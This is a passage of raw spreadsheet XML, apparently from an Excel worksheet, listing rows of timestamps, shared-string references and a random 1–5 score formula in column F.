        <v>6</v>
      </c>
      <c r="E24590" t="s">
        <v>22292</v>
      </c>
      <c r="F24590">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24591" s="1">
        <v>42983.638981481483</v>
      </c>
      <c r="C24591" t="s">
        <v>10</v>
      </c>
      <c r="D24591" t="s">
        <v>36</v>
      </c>
      <c r="E24591" t="s">
        <v>22293</v>
      </c>
      <c r="F24591">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24592" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24592" s="1">
        <v>42983.590914351851</v>
      </c>
      <c r="C24592" t="s">
        <v>10</v>
      </c>
      <c r="D24592" t="s">
        <v>6</v>
      </c>
      <c r="E24592" s="2" t="s">
        <v>22294</v>
      </c>
      <c r="F24592">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24593" s="1">
        <v>42983.589525462965</v>
      </c>
      <c r="C24593" t="s">
        <v>50</v>
      </c>
      <c r="E24593" t="s">
        <v>22295</v>
      </c>
      <c r="F24593">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24594" s="1">
        <v>42983.556747685187</v>
      </c>
      <c r="C24594" t="s">
        <v>10</v>
      </c>
      <c r="D24594" t="s">
        <v>6</v>
      </c>
      <c r="E24594" t="s">
        <v>22296</v>
      </c>
      <c r="F24594">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24595" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24595" s="1">
        <v>42983.546793981484</v>
      </c>
      <c r="C24595" t="s">
        <v>10</v>
      </c>
      <c r="D24595" t="s">
        <v>271</v>
      </c>
      <c r="E24595" t="s">
        <v>22297</v>
      </c>
      <c r="F24595">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24596" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24596" s="1">
        <v>42983.525081018517</v>
      </c>
      <c r="C24596" t="s">
        <v>10</v>
      </c>
      <c r="D24596" t="s">
        <v>263</v>
      </c>
      <c r="E24596" s="2" t="s">
        <v>22298</v>
      </c>
      <c r="F24596">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24597" s="1">
        <v>42983.521215277775</v>
      </c>
      <c r="C24597" t="s">
        <v>10</v>
      </c>
      <c r="D24597" t="s">
        <v>86</v>
      </c>
      <c r="E24597" t="s">
        <v>22299</v>
      </c>
      <c r="F24597">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24598" s="1">
        <v>42983.520451388889</v>
      </c>
      <c r="C24598" t="s">
        <v>10</v>
      </c>
      <c r="D24598" t="s">
        <v>6</v>
      </c>
      <c r="E24598" t="s">
        <v>22300</v>
      </c>
      <c r="F24598">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24599" s="1">
        <v>42983.513449074075</v>
      </c>
      <c r="C24599" t="s">
        <v>686</v>
      </c>
      <c r="E24599" t="s">
        <v>22301</v>
      </c>
      <c r="F24599">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24600" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24600" s="1">
        <v>42983.511747685188</v>
      </c>
      <c r="C24600" t="s">
        <v>686</v>
      </c>
      <c r="E24600" s="2" t="s">
        <v>22302</v>
      </c>
      <c r="F24600">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24601" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24601" s="1">
        <v>42983.490324074075</v>
      </c>
      <c r="C24601" t="s">
        <v>65</v>
      </c>
      <c r="E24601" s="2" t="s">
        <v>22303</v>
      </c>
      <c r="F24601">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24602" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24602" s="1">
        <v>42983.488078703704</v>
      </c>
      <c r="C24602" t="s">
        <v>10</v>
      </c>
      <c r="D24602" t="s">
        <v>46</v>
      </c>
      <c r="E24602" s="2" t="s">
        <v>22304</v>
      </c>
      <c r="F24602">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24603" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24603" s="1">
        <v>42983.466932870368</v>
      </c>
      <c r="C24603" t="s">
        <v>559</v>
      </c>
      <c r="E24603" s="2" t="s">
        <v>22305</v>
      </c>
      <c r="F24603">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24604" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24604" s="1">
        <v>42983.463182870371</v>
      </c>
      <c r="C24604" t="s">
        <v>454</v>
      </c>
      <c r="E24604" s="2" t="s">
        <v>22306</v>
      </c>
      <c r="F24604">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24605" s="1">
        <v>42983.454594907409</v>
      </c>
      <c r="C24605" t="s">
        <v>10</v>
      </c>
      <c r="D24605" t="s">
        <v>993</v>
      </c>
      <c r="E24605" t="s">
        <v>22307</v>
      </c>
      <c r="F24605">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24606" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24606" s="1">
        <v>42983.443101851852</v>
      </c>
      <c r="C24606" t="s">
        <v>1080</v>
      </c>
      <c r="E24606" s="2" t="s">
        <v>22308</v>
      </c>
      <c r="F24606">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24607" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24607" s="1">
        <v>42983.432627314818</v>
      </c>
      <c r="C24607" t="s">
        <v>10</v>
      </c>
      <c r="D24607" t="s">
        <v>178</v>
      </c>
      <c r="E24607" s="2" t="s">
        <v>22309</v>
      </c>
      <c r="F24607">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24608" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A24608" s="1">
        <v>42983.412199074075</v>
      </c>
      <c r="C24608" t="s">
        <v>10</v>
      </c>
      <c r="D24608" t="s">
        <v>112</v>
      </c>
      <c r="E24608" s="2" t="s">
        <v>22310</v>
      </c>
      <c r="F24608">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24609" s="1">
        <v>42983.405335648145</v>
      </c>
      <c r="C24609" t="s">
        <v>776</v>
      </c>
      <c r="E24609" t="s">
        <v>22311</v>
      </c>
      <c r="F24609">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24610" s="1">
        <v>42983.403668981482</v>
      </c>
      <c r="C24610" t="s">
        <v>65</v>
      </c>
      <c r="E24610" t="s">
        <v>22312</v>
      </c>
      <c r="F24610">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24611" s="1">
        <v>42983.397141203706</v>
      </c>
      <c r="C24611" t="s">
        <v>10</v>
      </c>
      <c r="D24611" t="s">
        <v>263</v>
      </c>
      <c r="E24611" t="s">
        <v>22313</v>
      </c>
      <c r="F24611">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24612" s="1">
        <v>42983.381990740738</v>
      </c>
      <c r="C24612" t="s">
        <v>48</v>
      </c>
      <c r="E24612" t="s">
        <v>22314</v>
      </c>
      <c r="F24612">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24613" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24613" s="1">
        <v>42983.371504629627</v>
      </c>
      <c r="C24613" t="s">
        <v>71</v>
      </c>
      <c r="E24613" s="2" t="s">
        <v>22315</v>
      </c>
      <c r="F24613">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24614" s="1">
        <v>42983.369618055556</v>
      </c>
      <c r="C24614" t="s">
        <v>67</v>
      </c>
      <c r="E24614" t="s">
        <v>22316</v>
      </c>
      <c r="F24614">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24615" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24615" s="1">
        <v>42983.359560185185</v>
      </c>
      <c r="C24615" t="s">
        <v>50</v>
      </c>
      <c r="E24615" s="2" t="s">
        <v>22317</v>
      </c>
      <c r="F24615">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24616" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24616" s="1">
        <v>42983.351134259261</v>
      </c>
      <c r="C24616" t="s">
        <v>559</v>
      </c>
      <c r="E24616" s="2" t="s">
        <v>22318</v>
      </c>
      <c r="F24616">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24617" s="1">
        <v>42983.348344907405</v>
      </c>
      <c r="C24617" t="s">
        <v>10</v>
      </c>
      <c r="D24617" t="s">
        <v>52</v>
      </c>
      <c r="E24617" t="s">
        <v>22319</v>
      </c>
      <c r="F24617">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24618" s="1">
        <v>42983.265428240738</v>
      </c>
      <c r="C24618" t="s">
        <v>41</v>
      </c>
      <c r="E24618" t="s">
        <v>757</v>
      </c>
      <c r="F24618">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24619" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24619" s="1">
        <v>42983.26221064815</v>
      </c>
      <c r="C24619" t="s">
        <v>43</v>
      </c>
      <c r="E24619" s="2" t="s">
        <v>22320</v>
      </c>
      <c r="F24619">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24620" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24620" s="1">
        <v>42983.239560185182</v>
      </c>
      <c r="C24620" t="s">
        <v>48</v>
      </c>
      <c r="E24620" t="s">
        <v>22321</v>
      </c>
      <c r="F24620">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24621" s="1">
        <v>42983.202222222222</v>
      </c>
      <c r="C24621" t="s">
        <v>124</v>
      </c>
      <c r="E24621" t="s">
        <v>22322</v>
      </c>
      <c r="F24621">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24622" s="1">
        <v>42983.124502314815</v>
      </c>
      <c r="C24622" t="s">
        <v>410</v>
      </c>
      <c r="E24622" t="s">
        <v>22323</v>
      </c>
      <c r="F24622">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24623" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24623" s="1">
        <v>42983.097962962966</v>
      </c>
      <c r="C24623" t="s">
        <v>314</v>
      </c>
      <c r="E24623" t="s">
        <v>22324</v>
      </c>
      <c r="F24623">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24624" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24624" s="1">
        <v>42983.089155092595</v>
      </c>
      <c r="C24624" t="s">
        <v>410</v>
      </c>
      <c r="E24624" s="2" t="s">
        <v>22325</v>
      </c>
      <c r="F24624">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24625" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24625" s="1">
        <v>42982.867511574077</v>
      </c>
      <c r="C24625" t="s">
        <v>10</v>
      </c>
      <c r="D24625" t="s">
        <v>52</v>
      </c>
      <c r="E24625" s="2" t="s">
        <v>22326</v>
      </c>
      <c r="F24625">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24626" s="1">
        <v>42982.727256944447</v>
      </c>
      <c r="C24626" t="s">
        <v>559</v>
      </c>
      <c r="D24626" t="s">
        <v>312</v>
      </c>
      <c r="E24626" t="s">
        <v>22327</v>
      </c>
      <c r="F24626">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24627" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24627" s="1">
        <v>42982.594895833332</v>
      </c>
      <c r="C24627" t="s">
        <v>10</v>
      </c>
      <c r="D24627" t="s">
        <v>17</v>
      </c>
      <c r="E24627" s="2" t="s">
        <v>22328</v>
      </c>
      <c r="F24627">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24628" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24628" s="1">
        <v>42982.543749999997</v>
      </c>
      <c r="C24628" t="s">
        <v>344</v>
      </c>
      <c r="E24628" s="2" t="s">
        <v>22329</v>
      </c>
      <c r="F24628">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24629" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24629" s="1">
        <v>42982.540856481479</v>
      </c>
      <c r="C24629" t="s">
        <v>10</v>
      </c>
      <c r="D24629" t="s">
        <v>17</v>
      </c>
      <c r="E24629" s="2" t="s">
        <v>22330</v>
      </c>
      <c r="F24629">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24630" s="1">
        <v>42982.524259259262</v>
      </c>
      <c r="C24630" t="s">
        <v>48</v>
      </c>
      <c r="E24630" t="s">
        <v>22331</v>
      </c>
      <c r="F24630">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24631" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24631" s="1">
        <v>42982.524004629631</v>
      </c>
      <c r="C24631" t="s">
        <v>16</v>
      </c>
      <c r="E24631" t="s">
        <v>22332</v>
      </c>
      <c r="F24631">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24632" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24632" s="1">
        <v>42982.494942129626</v>
      </c>
      <c r="C24632" t="s">
        <v>344</v>
      </c>
      <c r="E24632" s="2" t="s">
        <v>22333</v>
      </c>
      <c r="F24632">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24633" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24633" s="1">
        <v>42982.491284722222</v>
      </c>
      <c r="C24633" t="s">
        <v>10</v>
      </c>
      <c r="D24633" t="s">
        <v>17</v>
      </c>
      <c r="E24633" t="s">
        <v>22334</v>
      </c>
      <c r="F24633">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24634" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24634" s="1">
        <v>42982.453530092593</v>
      </c>
      <c r="C24634" t="s">
        <v>71</v>
      </c>
      <c r="E24634" s="2" t="s">
        <v>22335</v>
      </c>
      <c r="F24634">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24635" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24635" s="1">
        <v>42982.397326388891</v>
      </c>
      <c r="C24635" t="s">
        <v>71</v>
      </c>
      <c r="E24635" s="2" t="s">
        <v>22336</v>
      </c>
      <c r="F24635">
        <f t="shared" ca="1" si="384"/>
        <v>1</v>
      </c>
    </row>
    <row r="24636" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24636" s="1">
        <v>42982.375358796293</v>
      </c>
      <c r="C24636" t="s">
        <v>124</v>
      </c>
      <c r="E24636" s="2" t="s">
        <v>22337</v>
      </c>
      <c r="F24636">
        <f t="shared" ca="1" si="384"/>
        <v>3</v>
      </c>
    </row>
    <row r="24637" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24637" s="1">
        <v>42982.353344907409</v>
      </c>
      <c r="C24637" t="s">
        <v>16</v>
      </c>
      <c r="E24637" s="2" t="s">
        <v>22338</v>
      </c>
      <c r="F24637">
        <f t="shared" ca="1" si="384"/>
        <v>4</v>
      </c>
    </row>
    <row r="24638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24638" s="1">
        <v>42982.346041666664</v>
      </c>
      <c r="C24638" t="s">
        <v>124</v>
      </c>
      <c r="E24638" t="s">
        <v>22339</v>
      </c>
      <c r="F24638">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24639" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24639" s="1">
        <v>42982.338831018518</v>
      </c>
      <c r="C24639" t="s">
        <v>48</v>
      </c>
      <c r="E24639" s="2" t="s">
        <v>22340</v>
      </c>
      <c r="F24639">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24640" s="1">
        <v>42982.279097222221</v>
      </c>
      <c r="C24640" t="s">
        <v>48</v>
      </c>
      <c r="E24640" t="s">
        <v>22341</v>
      </c>
      <c r="F24640">
        <f t="shared" ca="1" si="384"/>
        <v>2</v>
      </c>
    </row>
    <row r="24641" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A24641" s="1">
        <v>42982.247094907405</v>
      </c>
      <c r="C24641" t="s">
        <v>48</v>
      </c>
      <c r="E24641" s="2" t="s">
        <v>22342</v>
      </c>
      <c r="F24641">
        <f t="shared" ca="1" si="384"/>
        <v>5</v>
      </c>
    </row>
    <row r="24642" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24642" s="1">
        <v>42982.224675925929</v>
      </c>
      <c r="C24642" t="s">
        <v>73</v>
      </c>
      <c r="E24642" t="s">
        <v>22343</v>
      </c>
      <c r="F24642">
        <f t="shared" ref="F24642:F24705" ca="1" si="385">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="24643" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24643" s="1">
        <v>42982.21775462963</v>
      </c>
      <c r="C24643" t="s">
        <v>8666</v>
      </c>
      <c r="E24643" t="s">
        <v>22344</v>
      </c>
      <c r="F24643">
        <f t="shared" ca="1" si="385"/>
        <v>2</v>
      </c>
    </row>
    <row r="24644" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24644" s="1">
        <v>42982.172314814816</v>
      </c>
      <c r="C24644" t="s">
        <v>41</v>
      </c>
      <c r="E24644" t="s">
        <v>22345</v>
      </c>
      <c r="F24644">
        <f t="shared" ca="1" si="385"/>
        <v>4</v>
      </c>
    </row>
    <row r="24645" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24645" s="1">
        <v>42982.161597222221</v>
      </c>
      <c r="C24645" t="s">
        <v>71</v>
      </c>
      <c r="E24645" s="2" t="s">
        <v>22346</v>
      </c>
      <c r="F24645">
        <f t="shared" ca="1" si="385"/>
        <v>2</v>
      </c>
    </row>
    <row r="24646" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24646" s="1">
        <v>42982.160370370373</v>
      </c>
      <c r="C24646" t="s">
        <v>71</v>
      </c>
      <c r="E24646" s="2" t="s">
        <v>22347</v>
      </c>
      <c r="F24646">
        <f t="shared" ca="1" si="385"/>
        <v>3</v>
      </c>
    </row>
    <row r="24647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24647" s="1">
        <v>42982.115844907406</v>
      </c>
      <c r="C24647" t="s">
        <v>7253</v>
      </c>
      <c r="E24647" t="s">
        <v>22348</v>
      </c>
      <c r="F24647">
        <f t="shared" ca="1" si="385"/>
        <v>4</v>
      </c>
    </row>
    <row r="24648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24648" s="1">
        <v>42982.057349537034</v>
      </c>
      <c r="C24648" t="s">
        <v>41</v>
      </c>
      <c r="E24648" t="s">
        <v>22349</v>
      </c>
      <c r="F24648">
        <f t="shared" ca="1" si="385"/>
        <v>5</v>
      </c>
    </row>
    <row r="24649" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24649" s="1">
        <v>42982.020694444444</v>
      </c>
      <c r="C24649" t="s">
        <v>140</v>
      </c>
      <c r="D24649" t="s">
        <v>197</v>
      </c>
      <c r="E24649" t="s">
        <v>22350</v>
      </c>
      <c r="F24649">
        <f t="shared" ca="1" si="385"/>
        <v>1</v>
      </c>
    </row>
    <row r="24650" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24650" s="1">
        <v>42982.008449074077</v>
      </c>
      <c r="C24650" t="s">
        <v>314</v>
      </c>
      <c r="E24650" s="2" t="s">
        <v>22351</v>
      </c>
      <c r="F24650">
        <f t="shared" ca="1" si="385"/>
        <v>5</v>
      </c>
    </row>
    <row r="24651" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24651" s="1">
        <v>42981.952002314814</v>
      </c>
      <c r="C24651" t="s">
        <v>1130</v>
      </c>
      <c r="E24651" s="2" t="s">
        <v>22352</v>
      </c>
      <c r="F24651">
        <f t="shared" ca="1" si="385"/>
        <v>2</v>
      </c>
    </row>
    <row r="24652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24652" s="1">
        <v>42981.939027777778</v>
      </c>
      <c r="C24652" t="s">
        <v>144</v>
      </c>
      <c r="E24652" t="s">
        <v>22353</v>
      </c>
      <c r="F24652">
        <f t="shared" ca="1" si="385"/>
        <v>4</v>
      </c>
    </row>
    <row r="24653" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24653" s="1">
        <v>42981.901655092595</v>
      </c>
      <c r="C24653" t="s">
        <v>10</v>
      </c>
      <c r="D24653" t="s">
        <v>6</v>
      </c>
      <c r="E24653" s="2" t="s">
        <v>22354</v>
      </c>
      <c r="F24653">
        <f t="shared" ca="1" si="385"/>
        <v>1</v>
      </c>
    </row>
    <row r="24654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24654" s="1">
        <v>42981.900821759256</v>
      </c>
      <c r="C24654" t="s">
        <v>140</v>
      </c>
      <c r="D24654" t="s">
        <v>141</v>
      </c>
      <c r="E24654" t="s">
        <v>22355</v>
      </c>
      <c r="F24654">
        <f t="shared" ca="1" si="385"/>
        <v>2</v>
      </c>
    </row>
    <row r="24655" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24655" s="1">
        <v>42981.8828125</v>
      </c>
      <c r="C24655" t="s">
        <v>140</v>
      </c>
      <c r="D24655" t="s">
        <v>141</v>
      </c>
      <c r="E24655" s="2" t="s">
        <v>22356</v>
      </c>
      <c r="F24655">
        <f t="shared" ca="1" si="385"/>
        <v>4</v>
      </c>
    </row>
    <row r="24656" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24656" s="1">
        <v>42981.870034722226</v>
      </c>
      <c r="C24656" t="s">
        <v>140</v>
      </c>
      <c r="D24656" t="s">
        <v>46</v>
      </c>
      <c r="E24656" t="s">
        <v>22357</v>
      </c>
      <c r="F24656">
        <f t="shared" ca="1" si="385"/>
        <v>4</v>
      </c>
    </row>
    <row r="24657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24657" s="1">
        <v>42981.766261574077</v>
      </c>
      <c r="C24657" t="s">
        <v>140</v>
      </c>
      <c r="D24657" t="s">
        <v>141</v>
      </c>
      <c r="E24657" t="s">
        <v>22358</v>
      </c>
      <c r="F24657">
        <f t="shared" ca="1" si="385"/>
        <v>5</v>
      </c>
    </row>
    <row r="24658" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24658" s="1">
        <v>42981.528680555559</v>
      </c>
      <c r="C24658" t="s">
        <v>253</v>
      </c>
      <c r="E24658" s="2" t="s">
        <v>22359</v>
      </c>
      <c r="F24658">
        <f t="shared" ca="1" si="385"/>
        <v>4</v>
      </c>
    </row>
    <row r="24659" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24659" s="1">
        <v>42981.493784722225</v>
      </c>
      <c r="C24659" t="s">
        <v>17</v>
      </c>
      <c r="E24659" s="2" t="s">
        <v>22360</v>
      </c>
      <c r="F24659">
        <f t="shared" ca="1" si="385"/>
        <v>2</v>
      </c>
    </row>
    <row r="24660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24660" s="1">
        <v>42981.439814814818</v>
      </c>
      <c r="C24660" t="s">
        <v>222</v>
      </c>
      <c r="E24660" t="s">
        <v>22361</v>
      </c>
      <c r="F24660">
        <f t="shared" ca="1" si="385"/>
        <v>1</v>
      </c>
    </row>
    <row r="24661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24661" s="1">
        <v>42981.27983796296</v>
      </c>
      <c r="C24661" t="s">
        <v>41</v>
      </c>
      <c r="E24661" t="s">
        <v>22362</v>
      </c>
      <c r="F24661">
        <f t="shared" ca="1" si="385"/>
        <v>4</v>
      </c>
    </row>
    <row r="24662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24662" s="1">
        <v>42981.080509259256</v>
      </c>
      <c r="C24662" t="s">
        <v>140</v>
      </c>
      <c r="D24662" t="s">
        <v>234</v>
      </c>
      <c r="E24662" t="s">
        <v>22363</v>
      </c>
      <c r="F24662">
        <f t="shared" ca="1" si="385"/>
        <v>5</v>
      </c>
    </row>
    <row r="24663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24663" s="1">
        <v>42980.959872685184</v>
      </c>
      <c r="C24663" t="s">
        <v>260</v>
      </c>
      <c r="E24663" t="s">
        <v>22364</v>
      </c>
      <c r="F24663">
        <f t="shared" ca="1" si="385"/>
        <v>2</v>
      </c>
    </row>
    <row r="24664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24664" s="1">
        <v>42980.56486111111</v>
      </c>
      <c r="C24664" t="s">
        <v>10</v>
      </c>
      <c r="D24664" t="s">
        <v>23</v>
      </c>
      <c r="E24664" t="s">
        <v>22365</v>
      </c>
      <c r="F24664">
        <f t="shared" ca="1" si="385"/>
        <v>1</v>
      </c>
    </row>
    <row r="24665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24665" s="1">
        <v>42980.472627314812</v>
      </c>
      <c r="C24665" t="s">
        <v>10</v>
      </c>
      <c r="D24665" t="s">
        <v>192</v>
      </c>
      <c r="E24665" t="s">
        <v>22366</v>
      </c>
      <c r="F24665">
        <f t="shared" ca="1" si="385"/>
        <v>3</v>
      </c>
    </row>
    <row r="24666" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24666" s="1">
        <v>42980.391863425924</v>
      </c>
      <c r="C24666" t="s">
        <v>1377</v>
      </c>
      <c r="E24666" s="2" t="s">
        <v>22367</v>
      </c>
      <c r="F24666">
        <f t="shared" ca="1" si="385"/>
        <v>3</v>
      </c>
    </row>
    <row r="24667" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24667" s="1">
        <v>42979.684895833336</v>
      </c>
      <c r="C24667" t="s">
        <v>10</v>
      </c>
      <c r="D24667" t="s">
        <v>52</v>
      </c>
      <c r="E24667" s="2" t="s">
        <v>22368</v>
      </c>
      <c r="F24667">
        <f t="shared" ca="1" si="385"/>
        <v>1</v>
      </c>
    </row>
    <row r="24668" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24668" s="1">
        <v>42979.671226851853</v>
      </c>
      <c r="C24668" t="s">
        <v>10</v>
      </c>
      <c r="D24668" t="s">
        <v>192</v>
      </c>
      <c r="E24668" s="2" t="s">
        <v>22369</v>
      </c>
      <c r="F24668">
        <f t="shared" ca="1" si="385"/>
        <v>5</v>
      </c>
    </row>
    <row r="24669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24669" s="1">
        <v>42979.670312499999</v>
      </c>
      <c r="C24669" t="s">
        <v>10</v>
      </c>
      <c r="D24669" t="s">
        <v>89</v>
      </c>
      <c r="E24669" t="s">
        <v>22370</v>
      </c>
      <c r="F24669">
        <f t="shared" ca="1" si="385"/>
        <v>5</v>
      </c>
    </row>
    <row r="24670" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24670" s="1">
        <v>42979.645810185182</v>
      </c>
      <c r="C24670" t="s">
        <v>10</v>
      </c>
      <c r="D24670" t="s">
        <v>6</v>
      </c>
      <c r="E24670" s="2" t="s">
        <v>22371</v>
      </c>
      <c r="F24670">
        <f t="shared" ca="1" si="385"/>
